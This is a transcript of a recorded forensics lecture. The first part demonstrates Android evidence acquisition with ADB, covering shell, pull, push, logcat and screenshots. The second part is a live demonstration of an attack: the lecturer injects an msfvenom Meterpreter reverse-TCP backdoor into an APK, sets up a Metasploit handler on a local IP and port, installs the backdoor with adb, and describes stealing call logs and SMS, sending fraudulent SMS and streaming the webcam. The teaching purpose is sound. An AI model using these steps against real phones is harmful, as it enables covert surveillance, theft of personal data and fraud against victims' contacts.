Okay, let's start our class again. My apology. Last week I was very busy and I am unable to meet the class. Okay, so sorry for that. So today we will try to do a little bit at the edge of this class actually. Let me see if I can share my screen. Present now. Okay. Entire screen. Share. Share. Okay. Okay. So I will. Oops. How can I stop this thing? Uh, anyway. Well, I forgot how to turn off the small screen here. Anyway. Oops. Okay. So this is our class. I'm planning to. This is planning. Hopefully everything goes to plan. So I will try to explain about how to do the forensic on our handphone, Android phone. So this is what I am going to do. If you want to learn how to attack the phone, you can see the other class. This is ethical hacking. This is how to attack. In this class, there is another, okay, this one, the mobile hacking. So in this class, there is a module on mobile hacking. So this one is on how to attack. Our class is how to do the forensic to see what happened when there is an attack. Okay. Uh, hmm, hopefully, oh masih di mute. Okay. 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 Let me see. Stop presenting? No, don't do that. Turn on caption? No. Uh, okay. No. Full screen, change layout. Picture in picture. Uh, well, okay. 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 So, my apology. Last week I was very busy because of the appointment to become a rector at Institute of Technology in Tangerang Selatan. So, everybody wants to talk, meet, and do some joint research or whatever. So, it's apology for that. So, today I will. Am I still sharing? I think I'm still sharing. I will share about the. So this is our class, IT forensic. So the topic today is the forensic access to, using ADB to Android. So we do the forensic in Android phone. This is only the forensic to check what's happened on the phone. If you want to learn how to attack the phone directly, there is another class called mobile hacking. Okay, this is the class ethical hacking. Within the ethical hacking class, we have mobile hacking module. This is how to attack the Android. The maybe one of the easiest one to attack the phone is using the MSF Phenom. This one, this one. Oops, this is Indonesian language. This is the class for undergraduates class. This is undergraduate class, my class, but this is for undergraduate students, so everything is in Indonesian language. This is how to make the Trojan, and then if we want to, this is the actual Trojan made by MSF Phenom. If we want to basically inject the backdoor into the actual application. For example, we have the original application, if and then we want to inject the backdoor into the application, we need to do different command. Basically, we need to add minus X, and then we can inject the application, and then it works. Okay, as simple as that. But actually, for attacking these things, the source code for this kind of things is very easy, available on the internet. You can check GitHub. Okay, GitHub basically the website where we can upload source code for many things, including good things and bad things. So both sides. Okay, so both sides actually will upload the source code to GitHub. One of the bad Android application is remote access Trojan. Remote APK. That's actually the source code to do remote access to your phone. So normally we use RED as short for remote access Trojan. Android. I think about 1,900 application like that. And then uh, if we compile and we install and we distribute our code, and we can access the victim phone to our Kali Linux. So that's how we attack. So these things, a lot of things, and then we can play around with these things, and then we can just spread the Trojan. So don't do this because this is very dangerous. Okay, so the source code is available, and then people can download easily, and we can build the Trojan very easy actually. Okay, now to do the forensic, it's little more difficult. Okay, let me see. Should I describe about? Uh, so you can read the theory behind the these activities use on these links. I will okay. I will review very briefly on the theory about these things. Okay, this is my certificate is expired. Oops, this is still Indonesian language. I thought this is in English. Oops, okay, this is the English, the Indonesian one. I have to check the English one. Oh, okay, this one. Okay. Okay, this notes is about mobile OS. There are several mobile OS, Android, iOS, and Windows. Of course, there are several other mobile OS. One of the newest one is maybe Harmony OS from Huawei. basically based on Android. Okay, there are several third-party application, a lot of third-party application for social media, productivity, navigation, banking, games, and so on, and lots of cloud storage, Google Drive, Dropbox, Microsoft OneDrive, iCloud, and so on. This is basically overview about the characteristics of mobile device, operating system, third-party application, and cloud storage. Okay, I think many of you already know about this, and then so that's the mobile device. Now, how to do the acquisition? How to get the evidence? There are basically two main techniques to do mobile forensic. We can do physical extraction or we can do logical extraction. Okay. Uh, in physical extraction, basically we physically copy. So we copy bit by bit all the data in the mobile device storage. So that will include the deleted, the hidden data. Okay, this method provides the complete pictures of the device condition at the time of acquisition. Okay, now to do the preparation, we need to secure the device to prevent data alteration, connect the device to forensic tools. Okay, select the image to be that we want to copy bit by bit. Okay, there are several acquisition tools that can read all sector of the device storage media, including internal storage and SD card. SD card is easier. Oh yeah, I forgot to mention. At this point, one of my friend, the way he teach the forensic to his students, his name is Kalpin. This is the guy. Oh, sorry. Okay, this is the person. Okay, so he actually teach on IT forensics, and but this is physically in physical class. So normally he buy several SD card from the phone reparation store in the mall. So he buy and then he give it to his students and ask the student to uh, analyze the SD card. So that's how we actually do the actual class. It's more practical and actually uh, analyze the real SD card from the store, repair store, because normally in repair store people that throw away the SD card and then we can analyze uh, what inside the SD card. Some of them, most of them will remove the file, delete the file, but actually we can recover the file. So that's the fun of it. Of course, we need to do the verification. When we do this thing, we need to verification. We need to calculate the hash value of the image to make sure when we reanalyze the image is still the same. So no alteration of the image and everything. So basically to ensure the data integrity of the device. Okay. The advantage, we can get the most complete data of the phone. We can recover deleted data suitable for cases that requiring in-depth analysis. So that's the advantage of physical extraction. In disadvantage, process takes longer than logical extraction and requires special forensic tools. Okay, so that's the physical extraction. In logical extraction, uh, basically we in this class I will demonstrate how to do the logical extraction. Hopefully the cable is okay. So the cable is new. I ran the class 2 days ago, and my cable is broken, so I cannot do the actual class. Okay, hopefully today is okay. Uh, so we can copy the data and access mobile device. And this process we normally use the cable. Uh, Of course, it's faster than physical extraction, but does not provide a complete picture of the as physical extraction. So basically, we connect the mobile device to computer. In this class is running Ubuntu. We can install the necessary driver, install forensic tool such as autopsy, sleuth kit and other tools, and then we do the forensic tool we use the forensic tool to access the mobile device file system. In this case, we use ADB to do these things, and copy the data from the file system to analyze on the computer. So the analysis process done at the computer. The advantage is faster, not require special forensic tools, suitable for cases that does not require in-depth analysis. The advantage does not retrieve deleted or hidden data. It can only retrieve the existing data. It depends on available driver and tools. Okay. So the difference between these two, in physical extraction, we can get the entire data. In logical extraction, only the accessible data. Slow, speed is slow. The logical extraction is faster. We need special tools to do this thing for physical extraction. In logical extraction is open source, complexity high, complexity low. So for beginners, easier this one. So we will do this one. Okay. Uh, there is several interesting link, autopsy, sleuth kit, SQLite. SQLite is the database basically. It's in normally run in the mobile device. SQLite can also run on desktop, including Ubuntu. But SQLite is basically the main database used if we use database within the phone. Okay, so yes, in the phone now is a computing platform. Basically, it's a computer. Our phone is actually computer, small computer. Some of the phone is quite powerful, but looks like simple device. It's actually not simple device. It's quite complex device. Okay, so that's about the difference between physical extraction and logical extraction. Okay, now we continue a little bit. Uh, I will skip this one. This is basically the technique to do routing, Android routing, how to route the Android. But this is not necessary. We will do hands-on Android forensic using ADB. Hope this one works. I don't know. Let's pray it works. What is ADB? ADB is Android debugging bridge. It's quite powerful command line tools used to communicate between Android device and computer. ADB is normally installed when we install the software development kit SDK when we do Android application development. For example, we install Android Studio. Android Studio will, when we install Android Studio, normally we will install also the software development kit SDK platform with Android Studio. So within the SDK platform, normally we have ADB in it. Okay, so ADB is there normally. We can install using platform tools method. So basically, we install the SDK, and it's the ADB will install together. Okay. If we already have Android Studio, we can use SDK Manager to install the platform tools. Okay. Now, the other thing, this is the tricky part. We need to enable developer option in the phone, in the Android, on the Android. So we need to install the developer option. Developer option usually hidden. We cannot see the developer option. We need to go to what's it called? Not system, setting. So we need to go to setting. Normally there is a system, and if we look around, there is normally build numbers. But in Huawei, I think it's called software numbers. See, Huawei is a little bit different than the normal Android. So the Chinese guy, they are to compete. They are trying to compete with the American guy. So they build their own Android. Okay, for example, Huawei, they build their own Android. So Huawei and Google is hate each other. So we are in the middle between these two. So normally it's build numbers. We need to tap, I think 7 times or 8 times. Tap the build number several times, many times. Then the developer option will be turned on. It will, and then after we turn on the developer option, we need to make sure USB debugging is enabled. Okay, and then we can plug the cable. Now we will try to do the plugging. So the problem is my USB is full. Okay, I have to. Okay, I'm in trouble. I'm still copying a file, but I think so. This is my computer. Okay, copy to. Still busy. Okay, how can I disconnect this guy? This one is okay. This one is not. Okay, let me see what happened. Okay, that's the problem. Okay, okay, this is the problem. My computer still downloading file from my server, so I have to go to my server first. This one I go to my server, disable the synchronization process. Basically, it synchronized the I'm still copying a library actually. So this is nothing to do with the our class, but because my computer is tied up to copy the library, so I need to disable first. So I stop the synchronization process. This is the server side. Okay, this is stop. Let me see this one. So the connection is refused now. Hopefully, okay, it refused. Let me unmount. Okay. Make sure when you when you want to disconnect something, you have to do it very gently. You have to do unmount and make sure nothing is okay. It's working now. It's unmount. Okay, so it works. Okay, data is no longer USB drive is no longer connected. So I take all the USB. Okay. Turn off the power. Okay. Let me see if my phone. So this is blank phone. Okay, the phone is blank. Okay, I hope the cable is okay. Okay, phone is connected. Oops, sorry. Connect will be, and it says, oops, the connected will be able to access data on the phone. Allow. Okay. If the phone is enabled, the developer option is enabled, and this is for the first time we actually access the phone. The phone need authentication, so it will say, okay, your computer with MAC address such and such want to access. Do you want to allow the computer to access your phone? So we have to say yes, then we can access. If we are able to access the phone, so the major problem we are when we are trying to access the phone is actually the cable. We need to buy a little bit expensive USB cable to do these things. Basically, a data cable, but do not buy a cheap data cable. Little bit expensive means around 100,000 rupiah, around that number, or more than 50, close to 100,000. There are so many cheap data cable. Yes, we can use that for several times, not for many times. So we need to make sure we have the good data cable. If the data cable is connected correctly, then we can do something like this. ADB devices, when we type this one, okay, let me see if it, okay, now it detect. So basically, I detect the device. If the cable is not connected, we are in trouble. So it will not show this information. So basically, I can access the device. The device is forgot. Basically, a Samsung, but forgot the number and so on. I just reset the device yesterday, basically. So it's very new, factory reset, new, nothing in it. This is very new device. Okay, now, so we have the device. In this one, we can see an emulator 5554 device. So an emulator, so like this one is not emulator. This is a real device. If we see emulator, that means the device is dummy device. Normally, an emulator is installed through the software development kit (SDK) that will be installed when we install the Android Studio. Android Studio is the application to what's that? To compile to build the Android application. So this is to uh, check the device. If you want to communicate to, let me see if there is any questions. Okay, sorry. Okay, okay, no question yet. Oh, am I sharing my screen? I think I share my screen, right? Okay, I think I share my screen. Sorry. Okay, now I will continue. It's sorry, not this one. I can access the shell of my phone. What is shell? Shell is this one. This is shell. So this is basically the interface of the operating system, Linux operating system. We normally call the interface is shell. So this is Linux. This is my PC. It has its own shell. I name my PC is i5. This is i5 PC. Okay. Now, uh, I want to access the shell of my phone, all I need just type ADB shell. Then I can go to the shell. See this? Change the name. The original name is i5. When I type ADB shell, I go to this one. This is actually on my phone. This is in the phone. This is the actual phone. Okay, so I can type ls so you can see the file within the phone. See this? Samsung. We can see the phone is actually Samsung. Uh, this one also Samsung. There's many things. Let me see if I can change to other folder. SD card. I go to the SD card. We can see there is a folder called this one. It's empty, but basically all the picture, photo, whatever, normally we put it here. There is a folder called download. So things, file, video that we download will be stored here. Movies for movie, pictures. Normally all the application will be stored in Android. Okay, data is the data of the application. So this is all the folder that store information about the application. Okay, if I install WhatsApp, we can see here WhatsApp, and then there is no WhatsApp here, so we cannot see any WhatsApp here. But if you install WhatsApp, there will be a folder called .com WhatsApp something lah. Okay, so let me switch to this. Sorry, com Garut. This is different folder. You can check the files here, but it's empty. So basically we can play around with this one. Okay, the other thing is media. Okay, it has a folder for Google Android Talk, but there will be nothing here. It has ringtones. This is the audio for ringtones, and we can see it there. Okay, now so we can do ls, cd, cat, and everything. Oh, cat is for if we want to see the file. Okay, for example, we want to see what is the content of this configuration file. We can cut eris conf. So this is the content of the file. Okay, let me see if I can see password file. This is the password file. This is Linux, basically same Linux as my PC Linux. So Android is basically Linux, and we can see the username that in this machine. Okay, so this is actually username. Okay, the not dangerous. The thing with this username, we allow this particular username to run shell. If we allow like this, system bin shell, so basically we can run shell using this application. Let me give you some comparison with the so make sure this is an auto-generated file, do not modify. That's what they said. Okay, if we want to see my file here, oops, okay, here, this is on my PC. This is on my PC. Say this one is different. The end. User has been no login, no login, no login, no login. This means this user will not be able to log into the system. So this is an application. This is an application. This one application. The operating system is not allowing the application to log in basically. Okay, but on Android it's a little bit more brutal. All the application is allowed to log in to the shell. So that's the difference. So this is actually why Android is a little bit dangerous, because they explicitly allow all the program to run the shell. Okay. Okay. If you want to copy uh, a file here to my folder on my computer, we can do something like this. Okay, ADB pull, we can copy the file on the Android, in the Android, to my folder here. So pull is to from Android to computer, push is from computer to Android. Okay, this is bad example. This is dangerous example. This is we are pushing an application from my computer to Android. This is dangerous. Basically, we actually sending the file to Android. If we sending a Trojan file, then we are in big trouble. The one that use the Android will be in big trouble. Let me show you how to pull. Okay, let me see if there I have a file. So we have SD card here. Okay, SD card. So we have the SD card. Uh, there is nothing in download. Okay, I have nothing in download. Let me see if I have editor. Nano. Does it have any nano? No. VI? No. Wow. Okay. Very good. I have nothing here. What I can do is touch. Hopefully there is a touch. Touch test.txt. Hopefully it works. No? Okay, it works. Hopefully. So there is a file called touch. Called test.txt. More. There's nothing here. Let me put some text to the file using this one, echo. This is a test, so I send it to test.txt. Okay, let me see if I can read. Okay, this is a test. Okay, so there is a text called this is a test in test.txt. I want to download this file using computer here. This is my computer. I go to folder downloads. Let me do different thing. Forensic. So I create a new folder called forensic. Okay, empty, nothing. I want to download the file using this pool. Okay, I have to check first where is the test file. Okay, the test file is in this folder, SD card downloads. Okay, so ADB pool. This one is documents, the text file. Okay, now I want to ADB pool. Okay, tests. Next, I put it here. Here is dot. If we want to put it one step lower, dot dot. Okay, but here is dot. Or we can do something like this. Forensic should be same ID. But if I don't want to type the whole path, I just can like this type. Okay, then I enter. It says one file pulled, nothing skipped. It's only 16 bytes. It takes 0.001 second. Okay. Let me ls. See, there is a file called test.txt. More test.txt. We can see the content of the file is the same basically. This is a test. So that's pull. So when we do pull things, we need to first play around with this one, and or let me see if it has. Oh, sorry. Okay. There is no lock of the operating system, but normally they put the lock of the application in the application folder. Okay. Uh, okay. Normally, if you want to see the config folder is here, but there is nothing. Okay. So if you want to see the actual lock, but because this phone only it's I reset it only yesterday, so there is nothing actually in the phone. But normally, if you want to find the lock, I go to Android. SD card Android depend where the actual folder for all the programs will be stored. In the Android, in this one, we can see in data, then we can see all these file. So sometimes they put the lock in these folders. Okay, sometimes. Okay, but we have to play around with this, find where they actually store the log. Okay, or we can ask ChatGPT or Google where to find log in the Android. Okay, for example, we want to check ChatGPT. Just go to here, and then whoops. Try ChatGPT, and then we can type where is the log file in Android. Okay. Using log chat command via ADB, we will be able to see the log. Okay, so we can do ADB log cat. Okay, if the device is rooted, the log is here. See, oh yeah, this device is not rooted yet. So okay, but we can check using this one log cat. Let me see if I can see. Oops. Oops, sorry, this is on the phone. We have to do it from here. Okay. Okay. That's actually the syslog. Okay. So we can see what happened. This is all in memory, so we can see what happened in the phone. Okay. So basically, try to switch the power to save power or something. Okay. So we can see this one, TLC communication. The previous one is about the power. Uh, so we can see things. This kind of things is also available on Linux. Let me see if I can see this one. Lock. This is the var lock. Uh, the one that we saw is the message normally. So this is the one that we saw. This one is on my computer, while this one is the phone. So we have timestamp. We can see what happened here. Okay, so very similar with my phone. This is actually the timestamp, but we need to convert it into the actual time. This is Linux time. Okay. Let me see if there is any questions. No, no questions. Okay, continue. So this is the lock because the phone is not rooted yet. I forgot the phone is not rooted. Because the phone is not rooted, then we have to see the lock is not in the in the file. Okay, so it's not on the file. It's on memory. So that's it. We cannot. Sorry, we uh, we cannot see the actual file. So that's poor. If we want to push something, uh, we can. Oh, this is when we do the actual ADB logcat and store the result in log.txt. Okay, this is helpful for tracing the activity of the phone. Uh, Let me see if I can do push is logical. Let me see if I can push something. The easiest thing is I can push a file. It's sorry, that's the actual Android. Uh, so this is the file. If I want to push something, I can push. This is my phone. It's sorry. Okay, this is my phone. I will go to folder downloads. I have several file here. Let me see if I can find several text file. So this is several text file. Let me see if I can send something. Okay. So let me see what inside this one. PI2 pertanyaan. It's sorry. So this is the actual text. Okay. Let me see if I can send this text. Wow, lot of things. Wow, this is questions from Bank Indonesia actually. BI is Bank Indonesia. So people asking questions. This file is generated during one of the webinar. Okay, so I will send this file to this phone. I will put it here. Okay, now to do these things, I will push the actual file, put it here. Okay, so I can do. So this is the file, the folder. So sorry. ADB push PI2. So I will put it here. Okay, slash. So the source is this file bi2 pertanyaan, and the destination is SD card download. So I will enter this one. It's transferred directly to the phone. Let me see on the phone. This is on the phone. I have the actual file bi2 pertanyaan more bi2 pertanyaan, so we can see the actual file here. Same file, but different computer. So I can see the phone as my computer as well. So we can send the file back and forth. Now this one, we can screenshot. Okay, we can ask the phone to do a screen capture and put it here, and then we can pull. Let us try this one. Whether this one is, we will not try this one. We can try this one. Let me see if the screen, okay, the screen is turned on. Let me do the screenshot here. Okay, so I did the screenshot. Let me pull the screenshot. Pull screenshot. Okay, let's pull. So we have the screenshot. Let me see what in the screenshot. F forensic. It's black because okay. The screen is standby again. It's black. So this is okay. Well, okay. Basically, we can do screenshot, but it's black because the screen is standby. I did turn on the screen, but it takes so short time. And then, how can I? Let me do the screenshot again. Okay, let me pull again. Let me see if it works or not. This time. It seems work. Ah, okay, now it's working. Because I take the phone to my uh, so I make sure the phone is not standby, so we can see it can take screenshot of my screen. Okay, this is needed for evidence, to say to the judge that okay, we have this application. This is the proof that the application is installed. That kind of thing. So we can do the screenshot directly from the phone, and then I will skip this one. Already done it. We can install an application from our computer to the phone. Okay, I will skip this one first because I want to skip to this one. We can dump the memory. Of course, we can put it into the text, or we can do it like this. Text. Okay, now it works. Okay, so that's uh, the thing running on the phone. Okay, it will say how many memory usage in kilobyte, the uptime real time, what kind of process is running on the system, and then we can see other things here. The uh, application again is basically we have DLC server. Uh, so this one, it has the all the application. This is the process ID. Okay, and then so this is the systems. The several process is persistence. Okay. Uh, if we categorize the application, this is the swap and so on. Okay. Basically, total RAM is around close to 3 gigabyte. Free RAM is 1.5. Use RAM is 1.2. Oh, okay. There is lost RAM and so on. Okay, so we can see the all the things in the memory. We can also analyze the database. Let me see if it has database. I don't know whether it has database. Uh, I don't think I have application with apps. Sorry. ADB shell. Oh, sorry, not S. ADB. Okay, I cannot clear the. Can I clear the? Oh, okay, it works. I thought I cannot do that. Okay, SD card, Android, data. Let me see if I have some Facebook files. Nothing about database. Okay, none of database here. I don't think we have database here. Mobile service. I don't think I have database here. Vending. Cache. Nah. Okay, no database. Sorry, no database. I have to install something with database, but there is none right now. So we cannot do these things. Basically, the SQLite database is a file. We can store the file in any folder, basically. Can I do locate here? Okay, none. Log system thing. Okay, so these are the all the command that available in my Android. Okay, we can do the same thing here. This is my PC. This is not the Android. My PC. We can do something like this as well. So these are the command in my computer. So it's similar. Okay, the Android normally is more simpler, less. The number of command is much reduced, while in PC we have more command and file to play with. Okay, so SQLite, the database is basically a plain text file, and then if we can see the database, you can run the database using SQLite 3 and the name of the database. That's how we can run the SQLite. Now if you want to analyze the data in the database, just pull the database to any folder in our PC. Okay, this is dot means the folder that we uh, enter the ADB. We can use this method to analyze many things. Uh, we can we can extract suspicious file analyze using this kind of tools. Okay, so we can analyze malware. We can also analyze rat. We need to check log files, network activity, configuration, file related to rat. Okay, if we have Wireshark, we can get the help from Wireshark to do the network analysis. Hopefully, the system stored the network, not basically network. Uh, we can dump the network traffic, and the network traffic dumped by the application can be viewed by Wireshark. So Wireshark basically the tool that can read the network traffic dumped by the sniffing application on the system. Now, if there is a malware, we can see this is example malware. Uh, Basically, we can see the name here. Okay, let me see here. It's sorry. SD card, Android data. See this one. So this to find a malware, we need to familiarize ourselves with the things in the application installed in the Android. For example, this one. This seems to be okay. Android provider media, Android system UI, Android vending, Facebook manager. That means it has Facebook. Google, Microsoft SkyDrive. We have Opera, it's a browser. We have Samsung Android application note, file sharing, sound picker. This all Samsung Android calendar, mobile service, and we have security Android for application launcher, stealth and gallery 3D, and this is Skype, and this one I don't know. Okay, but we can check what is this actually. The rest is okay, but this one is I don't know. So if you don't know something, we can copy paste and check. A slime 4. Wow. Okay. So this seems to be a reader to read majalah and surat kabar, magazine and surat kabar. What is surat kabar? Forgot. Okay. Oh, that means I install Slime. Interesting. Let me see if I actually install Slime here. Slime. Smart Tutor, screencast. Ah, I think it's the screencast. Let me see if I can share my screen. Okay, I will try to share my screen. Oops, what happened here? Okay, so I already installed screencast. I will run screencast, so hopefully I can see my screen. Start broadcasting. Okay, 192.168.0.208.6868. 208.6868. Oops. Broadcasting is in progress. 6868. Oops, it doesn't work. Nope, unreachable. Okay. I tried to screen sharing. So basically, I installed this application, uh, playgoogle.com. Just want to show what's in it. So screencast. So I installed screencast in my phone. Not up, not not this one. Nope, nope. Where is it? No, cannot find it here. So it's on the phone. So in theory, normally, if I install screencast and I turn on screencast, so it can render the screen to the web, so we can see the actual screen on the web. So we can play around, but so this kind of thing. But this one's cast to TV. So this is cast to HTTP web. But I cannot see it here. Okay. Anyway, fail. Okay. Uh, this is the example. We connect to this one is one to check for malware. Okay. Let me see if I can. What time is it? 7:24. Let me see if I can uh, create an application and put a malware in the application. Okay. Hopefully works. I uh, I will create an application in 5 minutes. We can use App Inventor 2 to create Android application. This one I normally use for teaching. So I'm going to do demonstration how to do the actual attack. Now it's attack. Okay. I accept the term agreement, but to do the actual attack, I have to create the application first, and then I will do not show this again. Continue. Get started. No, I don't want to have any tutorial. Okay, so this is the actual dashboard to build the application. I will. This kind of thing is for uh, primary school student, basically. So I will name the application test or president. Okay. So I have the application called president. So this is the program looks like. I will create a simple application. Basically, I have a text box. I have a button. So the scenario is we can type text here. If I press the button, it will speak. It will convert text to speech. That's one. Text to speech. So I put it here. So basically, I have three component. I have text box, text button, and text to speech. In the button, I want to type this one. Speak up. So I want to. So the button name I change it to speak up. So we have three component. Now I need to do some little bit of programming here. Blocks. Basically, I want to call text to speech to speak. The message is the one in the text box. Where's the text? This one. Text in the text box will become the message when something is called text to speech to speak. So I will click this one. Okay. Now, all of these things will be run when we press the button. So where is the button here? Okay. So when button one click, do call text to speech speak message take from the text box one. It's called text, so I put it here. So that's the actual program. That's it. And then we can build the program as APK. Okay. So I upload the compile the program. Basically, it's sent to MIT. This is MIT who run the service. The service is for children to play around to build the application, and then it has two options. The result will be two options. We can download the application using QR code, or see, we can use QR code. But now I will download the application. Okay, downloading the application. See, the application is downloaded. It's called president.apk. Okay, now I need to put phenom to the application. So I need to try Kali Linux. I hope I can put phenom in the application. Hopefully, I don't know. So this is the material for different course. Is the course on ethical hacking. Where is the course? Okay, I have to open. Okay. This one, ethical hacking. Mobile hacking, this one, and hand-on. So this is the way. We have two options here. We can use MSF Phenom, and then we can create our own backdoor without any application. So basically this is the actual backdoor, no application, nothing. And then this one, the second one, is we infected the original application using Phenom. Okay, I will try to make this one. This is more difficult actually. We need to install APK tools in Kali Linux to be able to infect the original file. Okay, using APK tools, basically we can check whether an application is infected or not. So the APK tools is useful in at least two ways. One way is to create the actual infected application. So it helped MSF Phenom to create the infected application. The second one is to check whether the actual file is infected. So it can do both good deed and bad deed simultaneously. So this is APK tools. We need to install APK tools in Kali Linux. Okay. Now, I need to know the IP address of the Kali Linux and the port number. Okay. For example, this is the actual Kali Linux. The zoom in, zoom in, zoom in, zoom in. Okay. Okay, the IP address is 192.168.0.212. So this we have to make sure we take note of on this one. The port number we can select any port number we like, but make sure the port number is quite high, I mean quite big. It can be like 4,000 and above. Okay, so I will make sure uh, I have these things. So I will transfer the file. So the president.apk is in folder downloads. So I will transfer the file. Oh, what's the IP address of this one? This is 3. The number IP address is 192.168.0.3. The folder is downloads. The file name is president.apk. So I will download now. Secure copy. This one. APK. Okay. Let me see if I can do. It's sorry. Wrong password. Okay. So it's managed to download this APK. This APK, to remind you that this APK we built ourselves here. This is the actual APK, and we download now the APK, and then we need to. Okay, better I open here so I can do some copy paste. Otherwise, we are in big trouble. Okay, it's loading. I change into super user. Oops. Kali. Okay, clear. See, I am in root now. Before I am only normal user. The username is Kali. Now I am root. Clear. Home Kali. So this is the home Kali. We have the President APK. We have several other APK. So I play around a little bit with the APK. This is the one that we make. I want to make sure I want to infected the president.apk. Uh, if okay, this is the browser. So I browse the OnnoCenter wiki, uh, ethical hacking, mobile hacking, and then this one. Oh, I have the English version. Okay. Okay. I will go for this one. Paste selection. Now I have to edit this one. So the original application name is President. So the command is msf phenom minus x president. Okay. I have to tell the MSF phenom the payload is Android, Meterpreter, reverse FTP. The host name is the IP address is 192.168.0. Forgot. Check again. Make sure I'm not 212. Okay. Sorry. This one. 212. Oops. 212. Port number is, for example, I will choose 8888, and then the name of the application is change. For example, president underscore infected. Okay, so just to but if you are a real hacker, you will not put a president infected. Of course, they will not install the infected file. So we need to make sure we select a more interesting name so people will install the application. Okay. Uh, it it will try to do the infection. If I fail, if this one fail, I still have this file backdoor.apk. Hopefully we can play around with backdoor.apk. The problem with backdoor.apk, I don't know the setting of the lhost, or I can regenerate using this one. Zoom in, zoom in. It's sorry. Okay. Okay. So I will use this one. MSS Phenom. Lhost is 212, port is 888. The name is backdoor. Okay. Okay. This is how to create a backdoor. It's as simple as this. 0212. Port number is 8888. Takes a while. Hopefully it works. Okay. This one finish. So we have president infected. It will point to 192.168.0.212, port 8888. I have to transfer this file to my computer because my computer is the one who has access with ADB to the phone, and then we can transfer the file. Okay, so I have two files now. Okay, backdoor APK and president infected APK. Okay, I will transfer this APK. Hey, where is the president infected APK? I think. Wow, where is where is this guy? Wow, It's gone. Oh, okay. It has error. APK2 not supported. Please download the latest APK. Ah, okay. So my APK2 is not, the version is too low. I cannot use this version, APK2 version 2.0. Uh, okay, so this one fail. This one fail. So I still have one, the backdoor. Okay. So I have to transfer the backdoor APK to my computer. So it's already transferred. Uh, Now I need to run MSF console, and we need to run this command. First, I have to tell the MS. So I'm running MSF console now, and then I use exploit multi-handler and set payload same as the payload used to generate the backdoor, which is Android Metterpreter reverse TCP. I have to set the IP address of the host, and I have to set the port. These two must be the same between the Kali Linux and the APK, and then we can run exploit. Now I will set this one to make sure it's standby, and then I will upload the APK in my. So okay, this is the MSF console. Okay, when in module, use back to go back to the top level first. Now, okay, Metasploit is very handy tools. It has 2,397 exploit. It has 1,391 payloads, several versions for evasion of the attack. So it's quite cool. So I will. This one is okay. I will tell the MSF console that I will use exploit with multi-handler. Okay. Now I can set the payload to Android Metterpreter reverse TCP. Okay. I have to set lhost. Set lhost to 192.168.0.212. Lhost set to that one, and then I have to set the L port as well. Set L port 8888. That's it, and do the exploit. Exploit. It's standby now. It will start. It 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 becomes ready. It ready basically to receive any connection from any IP address to port 192.168.0.212.888. So this is the Kali Linux side. Now in the computer side, eh, phone side, we have backdoor APK here. We have to transfer backdoor APK to phone. Oops. Shell. SD card. We can put this thing into download, or we can install directly. Let me install directly. This one. Okay. We can install directly the application. This is bad. We will do it from here. ADB install backdoor.apk. This is dangerous. So the problem with this, I think we will be having difficulty to do the forensics because there is no trace of the application on the phone because I'm not transferring the file to the phone. So if we do the forensic, it's on the phone. It's not on the phone. If it is on the phone, then we can do something like this. Here, we can pull the name of the application and so on. Oops. I think we can still do something like that. Okay, let me install it. Okay, success. The application is installed. Uh, I'm trying to make sure it runs. The application is on the background actually, but I don't know whether. Let me see. Okay. Okay. PS is to see the process. Let me see. Let me see if we can see all process. Okay. Uh, these are the program run on the phone. Okay. This is I'm looking for the president. There is no president here. Nope. No president. No president. But let me see if it is working. Okay, the application is not working. It's installed, but it's not run. That's the problem. Let me see if I can run this thing. I cannot show the screen to you guys. Okay. Oh, okay. Okay, I found the application. Uh, Sorry, I will do a screenshot so I can show to you how the application looks like. Where is the screenshot thing? Okay, this one. Okay, let me download the screenshot. Okay, let me see the screenshot. Okay, this is actually the application here. It's not running yet. I will run the application now. Okay. It's not running. It doesn't show anything. Let me see if it. Let me see if I can go to shell. Nope, nothing. Up. No, no. Okay, the backdoor is fail. It's not running. This one is not running as well. It's ADB. Sorry. Okay, it's not running. Sorry. Oops. Okay, not running. Sorry guys, it's not running. Uh, so this one is not working. Where is it? Where is it? Not this one. Uh, where is my note on building? So this one is not working. The problem with why it's not working in newer Android, it will protect the Android from install and running application that is not registered in Google Play, something like that. So if it's not registered and reviewed by Google Play in new Android operating system, it will block the application to install and run. This one is installed, but it's not run. We are unable to run these things, and I have a problem with this one. The APK tool is not recent enough. It's not the new one, not the newest one, so I cannot run this too. So both fail. Okay. If it is not fail, I will show the attack, the actual attack. If it's not fail, but the more recent Android is more difficult to attack on this one. But basically on the attack, I want to show if it is I want to show if we can find the problem, or if we can find the log on the application, and we can evaluate how to do the actual forensic of this kind of application. Now, to show what happened when we attack, I go to this one. Not this one. Okay. Where is it? Proof suite? No. Okay. Oh, yeah, yeah, yeah. This one. Android attack. If the application is running, we can do something like this. So I can type MSF console, use exploit multi-handler, set payload Android method to reverse FTP, lhost to my apply address, the port, and exploit. Then I can, the phone will be connected to my Kali Linux computer. From Kali Linux, I can send check root to check whether the phone is rooted or not, and then I can send geolocate to check the location of the phones. I can ask to dump all the call to a file. I can dump all the SMS to a file. I can send SMS to certain number with certain text. Okay. For example, after we can examine the call log or SMS, so we know who this guy sending message to or talk to, and then we can send to the same number as the one we evaluate here using different text. For example, the text can be something like this. Please help me. My wallet is lost. Somebody took my wallet. Can you please send a certain amount of money to my account? This is my account, and that's it. Because the person received the message from the number he familiar with, and then he will think this is real, and he will send the money. So that kind of thing lah. Okay. The other problem is we can check the webcam list, how many webcam is on the phone. We can snap webcam number 2 and we can stream webcam number 2. The phone is blank, the screen is black, and then the hacker can get the video from the webcam as well as the audio. So both video and audio can be streamed by the hacker. The complete list of this can be found on the internet. For example, meter, preter, MSF, Venom. Okay. This is the cheat sheet, for example. I hope I can get the. Oh, this is how to build one. Let me see if I can. Oh, we can build the MSF Venom for Linux, Windows, Mac, and so on. This one is for PHP. I'm looking for. I'm not looking for this one. I'm looking for the command. Let me see if I can find the command. Payload. Where is it? Nope. The other day I can find all of it. Meter, preter. This one. Hopefully, this one works. Okay, this one. Says info, get user ID, get process ID, PS. So we talk to within the phone, so we can do something like this. So this is the actual command that can be accepted by the interpreter. But the command I use is actually the command for the phone. So we can download all the credential and so on. Okay. So this is actually screenshot, screen share, scan, key scan dump, and so on. Okay. So it's quite scary actually. This is only a few of them. Okay. Let me see if there is any questions. No, no questions. Okay, great. Okay. Let me see if I can. Whoops. Oops. It's open. Okay, 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 okay. Okay, it's open actually. Interesting. Interesting. Uh, so it's open. It's connected. The phone finally connecting to his one. Uh, Let me see here. Okay, we can do WLAN geolocate, for example. Okay. Ah, I need to enter the API to. Okay, I don't have any API, so I cannot do that. We need the API. Okay, we need something more simpler than that. Dump call lock. Okay, dump call lock. 